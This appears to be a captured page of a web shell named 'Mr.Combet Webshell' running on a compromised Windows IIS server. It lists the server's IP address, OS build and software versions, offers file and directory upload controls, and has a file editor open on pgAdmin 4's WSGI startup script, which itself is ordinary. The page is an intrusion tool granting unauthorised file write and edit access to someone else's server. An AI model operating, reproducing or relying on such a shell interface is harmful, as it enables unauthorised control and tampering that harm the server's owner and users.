Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
Program Files
/
PostgreSQL
/
14
/
pgAdmin 4
/
web
/
Edit File Name :
pgAdmin4.wsgi
########################################################################## # # pgAdmin 4 - PostgreSQL Tools # # Copyright (C) 2013 - 2021, The pgAdmin Development Team # This software is released under the PostgreSQL Licence # ########################################################################## import os import sys if sys.version_info < (3, 4): raise Exception('This application must be run under Python 3.4 or later.') os.environ['SCRIPT_NAME'] = '/pgadmin4' import builtins root = os.path.dirname(os.path.realpath(__file__)) if sys.path[0] != root: sys.path.insert(0, root) # Ensure the global server mode is set. builtins.SERVER_MODE = True import config # When running it as a WSGI application, directory for the configuration file # must present. if not os.path.exists(os.path.dirname(config.SQLITE_PATH)): raise Exception( """ Required configuration file is not present! Please run setup.py first!""" ) from pgAdmin4 import app as application
Save